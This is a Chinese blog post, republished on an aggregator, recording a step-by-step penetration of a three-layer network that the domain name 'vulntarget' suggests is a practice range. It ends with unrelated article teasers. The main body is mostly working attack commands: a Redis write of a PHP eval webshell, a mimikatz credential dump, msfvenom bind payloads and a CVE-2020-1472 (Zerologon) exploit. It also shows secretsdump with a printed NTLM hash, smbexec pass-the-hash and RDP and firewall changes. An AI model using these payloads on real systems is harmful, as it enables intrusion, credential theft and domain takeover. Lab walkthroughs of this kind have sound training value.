内网渗透-src挖掘-外网打点到内网渗透-3层内网渗透测试记录-2023年1月

news2024/11/24 3:50:12

1、通过信息搜集,发现目标有一个外网访问的通达OA系统
在这里插入图片描述
2、通达OA的漏洞是非常多的,这里利用大佬写好的通达OA一键getshell工具
成功获取webshell
在这里插入图片描述
3、连接webshell,上传cs马儿到服务器
在这里插入图片描述
4、执行获取主机权限
在这里插入图片描述
成功上线
在这里插入图片描述

5、通过Ladon插件发现系统有2张网卡,有一个内网ip,10.0.20.98
在这里插入图片描述
6、因为目标是win7系统,可以直接抓取明文密码
在这里插入图片描述

7、使用ladon插件开启目标3389桌面
在这里插入图片描述
使用socket代理
在这里插入图片描述
使用proxifier代理软件,成功连接入目标内网
在这里插入图片描述

8、使用抓取到的远程登陆目标服务器
上传fscan到目标服务器,扫描内网网段,发现内网中有一台服务器有redis未授权访问漏洞
在这里插入图片描述
9、因为此时我们使用了socket代理,我们可以直接访问到目标内网,发现可以直接连接目标redis
在这里插入图片描述
10、通过对该ip进行端口扫描,发现该ip存在l.php探针页面
在这里插入图片描述
找到了绝对路径页面

C:/phpStudy/PHPTutorial/WWW

在这里插入图片描述
因为知道了目标网站绝对路径,可以直接写入webshell进行连接

1.
config set dir C:/phpStudy/PHPTutorial/WWW
2.
set zznb "nnn<?php @eval($_POST['zznb']);?>nnn"
3.
config set dbfilename zznb.php
4.
save

在这里插入图片描述

使用御剑进行连接,成功连接
在这里插入图片描述

11、因为现在我们是在外网的服务器上,想要在本地上线内网的服务器,我们需要将2层内网的数据转发到第一层的外网服务器进行转发上线,这里有2种办法,接下来我将介绍2种办法
(1)cs设置端口转发
在这里插入图片描述
(2)使用mimikatz抓取hash进行445端口横向碰撞
官网介绍:SMB Beacon使用命名管道通过父级Beacon进行通讯,当两个Beacons连接后,子Beacon从父Beacon获取到任务并发送。因为连接的Beacons使用Windows命名管道进行通信,此流量封装在SMB协议中,所以SMB Beacon相对隐蔽,绕防火墙时可能发挥奇效。

webshell先上传mimikatz
在这里插入图片描述
执行以下命令

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" exit >> pass.txt

将执行后的pass.txt文件下载下来
在这里插入图片描述
cs上新增一个监听
在这里插入图片描述
转到视图,选择目标,使用psexec64
在这里插入图片描述
将mimikatz抓取到的hash填入,选择smb 监听器和对应会话
在这里插入图片描述
在这里插入图片描述
等待执行完成之后二层内的ip即可上线
运行成功后外部可以看到∞∞这个字符,这就是派生的SMB Beacon。这种Beacon在内网横向渗透中运用的很多。在内网环境中可以使用ipc $生成的SMB Beacon上传到目标主机执行,但是目标主机并不会直接上线的,需要我们自己用链接命令(link )去连接它。

在这里插入图片描述
12、在二层内网中使用命令ipconfig,发现目标开启使用的是双网卡,还有第三层10.0.10.0/24段的地址
在这里插入图片描述
上传fscan扫描,发现该网段存在10.0.10.110地址,且该ip为域控服务器
在这里插入图片描述
13、msf上线一层服务器
在这里插入图片描述
msf使用代理上线二层服务器
添加路由,设置代理,arp获取到内网同网段IP,一次使用如下命令

run post/multi/manage/autoroute
use auxiliary/server/socks_proxy
run
sessions -i 1
arp a

代理之后远程的服务器上msf可直接访问到第二层服务器
在这里插入图片描述
现在使用获取第一层外网服务器的代理上线二层服务器
如下命令生成正向连接马儿

msfvenom -p windows/x64/meterpreter/bind_tcp  LPORT=4545 -f exe >4545.exe

msf执行如下命令

use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set rhost 10.0.20.99
exploit

在cs上线的地方执行如下命令

shell C:\phpStudy\PHPTutorial\WWW\4545.exe

成功上线第二层服务器
在这里插入图片描述
14、定位域控,得到域控ip

run post/windows/gather/enum_domain

在这里插入图片描述

得到域控IP10.0.10.110
账号:win2019
域:vulntarget.com

再次添加win2016的路由,这样就可以访问到域控

run post/multi/manage/autoroute

测试代理是否成功

bg
proxychains4 nmap -Pn -sT 10.0.10.110 -p6379,80,8080,445,139

在这里插入图片描述
15、使用域内大杀器获取第三层服务器权限
直接使用CVE-2020-1472(域内提权)

proxychains4 python3 cve-2020-1472-exploit.py 域控主机名 域控IP
proxychains4 python3 cve-2020-1472-exploit.py win2019 10.0.10.110

在这里插入图片描述

此时密码已经置空
再使用impactet来进行下一步的操作
获取域控hash

proxychains4 python3 secretsdump.py vulntarget.com/win2019\$@10.0.10.110 -no-pass

在这里插入图片描述
得到administrator的hash

aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15

直接就拿下域控

proxychains4 python3 smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15 administrator@10.0.10.110

在这里插入图片描述
开启远程桌面

第一步
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f
第二步
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
第三步
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

在这里插入图片描述
将administrator的hash值放到cmd5上进行破解
在这里插入图片描述
直接进行远程登陆

proxychains4 rdesktop 10.0.10.110
账号:vulntarget.com\administrator
密码:Admin@666

在这里插入图片描述
在这里插入图片描述
最终拿下域控!!!!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/144391.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

百分之80新手都不知道,SEO搜索引擎优化【sitemap网站地图 配置】

Sitemap 可方便网站管理员通知搜索引擎他们网站上有哪些可供抓取的网页。最简单的 Sitemap 形式&#xff0c;就是XML 文件&#xff0c;在其中列出网站中的网址以及关于每个网址的其他元数据&#xff08;上次更新的时间、更改的频率以及相对于网站上其他网址的重要程度为何等&am…

浅析oauth2.0及应用场景

讲OAuth2.0之前&#xff0c;我们先理解一个概念&#xff0c;授权用户和资源权限的概念授权用户&#xff1a;用户访问某个应用系统&#xff0c;该应用系统请求认证中心授权以获取这个登录用户的信息&#xff0c;但并没有得到这个用户的密码&#xff0c;这个就是OAuth2.0实现的要…

N个点,求距离最近的两个点---分治策略(1)

设平面有n个点的直角坐标是,i 1, 2, ...,n,求距离最近的2个点&#xff0c;距离计算&#xff1a; 首先这个问题是可以使用蛮力算法&#xff0c;一共n(n-1)/2个点对&#xff0c;每对点对计算需要常数的时间&#xff0c;蛮力算法需要的时间。 由于点对有二维的空间坐标&#xf…

(三十)Vue之回顾本地存储webStorage

文章目录webStorageLocalStoragesessionStorage改造TodoList案例为本地存储Vue学习目录 上一篇&#xff1a;&#xff08;二十九&#xff09;Vue之组件化编码流程 下一篇&#xff1a;&#xff08;三十一&#xff09;Vue之自定义事件 webStorage 使用HTML5可以在本地存储用户…

Python基础(二十二):文件操作

文章目录 文件操作 一、文件操作的作用 二、文件的基本操作 1、文件操作步骤

同时开启的revit模型和navisworks如何同步呢?

一、 Navisworks与Revit同步问题 同时开启的revit模型和同时开启的navisworks如何同步呢? 1.如图1所示打开了一个revit模型 将模型保存在指定的路径上&#xff0c;然后通过直接拖拽的方式在navisworks manage打开模型文件&#xff0c;过程中会出现读条状态&#xff0c;如图2所…

【MySQL进阶教程】 索引使用与设计原则

前言 本文为 【MySQL进阶教程】 索引使用与设计原则 相关知识&#xff0c;下边将对索引的使用&#xff08;包括&#xff1a;验证索引效率&#xff0c;最左前缀法则&#xff0c;范围查询&#xff0c;索引失效情况&#xff0c;SQL提示&#xff0c;覆盖索引&#xff0c;前缀索引&a…

Struts2获取表单数据

Struts2获取表单数据Struts2获取表单数据1、原始Servlet方法2、属性封装3、表达式封装4、模型驱动封装Struts2获取表单数据 在Struts2中获取表单数据或提交路径的参数值的方式有4种。如下&#xff1a; 原始Servlet方法属性封装表达式封装模型驱动封装 1、原始Servlet方法 该…

文章书写方法

这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题&#xff0c;有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注…

Python爬虫 xpath解析基础

今天继续给大家介绍Python爬虫相关知识&#xff0c;本文主要内容是Python爬虫 xpath解析基础。 一、xpath简介 xpath&#xff0c;即XML Path Language&#xff0c;是一种用来确定XML文档中某部分位置的语言&#xff0c;Xpath以XML为基础&#xff0c;可以提供用户在数据结构树…

8、可观测性--链路追踪

文章目录链路追踪服务之间的依赖Span 的构成Span 之间关系链路图链路追踪与 Dapper链路追踪的作用链路查询性能分析拓扑图依赖关系跨应用/语言采样率链路追踪 首先&#xff0c;我来带你了解一下什么是链路追踪&#xff1f; 服务之间的依赖 在前言中介绍了数据的来源&#xf…

运营|为什么需要配置https?

什么是HTTPS、它带来了什么? 从名字来看,它比http多了一个“s”,这个“s”表示安全。目的在于提供更安全的HTTP通道,即HTTP下加入SSL层并且加密。太详细的我就不再这里说了,再说我就要抄百度百科了。简单来说,不同于HTTP使用80端口,HTTPS使用443端口,HTTPS还需要一个付…

【手写 Vue2.x 源码】第七篇 - 阶段性梳理

一&#xff0c;前言 上篇,介绍了 Vue 数据初始化流程中&#xff0c;Vue 实例上数据代理的实现&#xff0c;核心思路如下&#xff1a; 将 data 暴露在 vm._data 实例属性上利用 Object.defineProperty 将 vm.xxx 操作代理到 vm._data 上 本篇&#xff0c;对当前版本的数据劫持…

[VP]河南第十三届ICPC大学生程序竞赛 J.甜甜圈

前言 传送门 : https://ac.nowcoder.com/acm/contest/17148/J 题意 : 给定两个甜甜圈堆 , 每次只能吃所有中最甜的那一个 , 否则的话就移动 询问最小的移动步骤 思路 : 很明确的一个目标 , 寻找当前最大值并且求出距离 那么我们考虑将两个甜甜圈堆进行合并 , 使得变成一个…

LeetCode:17. 电话号码的字母组合

17. 电话号码的字母组合1&#xff09;题目2&#xff09;思路3&#xff09;代码4&#xff09;结果1&#xff09;题目 给定一个仅包含数字 2-9 的字符串&#xff0c;返回所有它能表示的字母组合。答案可以按 任意顺序 返回。 给出数字到字母的映射如下&#xff08;与电话按键相同…

【C++入门】C向C++过渡(上)

前言在正式进入C之前&#xff0c;我们首先要对C有一个基本的认知。这里我就不过多的进行描述了&#xff0c;有兴趣的可以去网络搜索一番。总而言之&#xff0c;从名称上面我们也可以看得出来&#xff0c;C是在C的基础上进行不断地优化发展。事实上确实是这样&#xff0c;C语言中…

k8s部署gitlab

Gitlab以容器方式运行&#xff0c;需要持久化如下几个目录中的数据: 持久化本地位置 容器位置 使用 ${sc}/data /var/opt/gitlab 用于存储应用程序数据。 ${sc}/logs /var/log/gitlab 用于存储日志。 ${sc}/config /etc/gitlab 用于存储 GitLab 配置 文件。 1、下载…

C语言柔性数组的‘美‘

目录 柔性数组的使用和概念 柔性数组的特点 柔性数组与指针的区别 柔性数组的好处 柔性数组的使用和概念 arr[]编译 C99 中&#xff0c;结构中的最后一个元素允许是未知大小的数组&#xff0c;这就叫做『柔性数组』成员。 柔性数组的特点 1、柔性数组成员前必须至少有一个其他…

黑龙江创维E900V22C_S905L3(B)_安卓9.0_开启设置隐藏无线_完美线刷固件包

黑龙江创维E900V22C_S905L3(B)_安卓9.0_开启隐藏设置无线WIFI_完美线刷固件包 提示&#xff1a;大部分芯片均为S905L3A&#xff0f;AB&#xff0c;这两个是可以通刷的。 1、此分享固件包芯片特殊&#xff0c;芯片为S905L3&#xff0c;还有S905L3B芯片&#xff0c;理论上通刷…

C++设计模式:建造者模式(详解+案例代码)

文章目录建造者模式实现步骤实现代码案例一&#xff1a; 组装电脑案例二&#xff1a;汉堡店点餐优缺点建造者模式 建造者模式是一种对象创建型模式之一&#xff0c;用来隐藏复合对象的创建过程&#xff0c;它把复合对象的创建过程加以抽象&#xff0c;通过子类继承和重载的方式…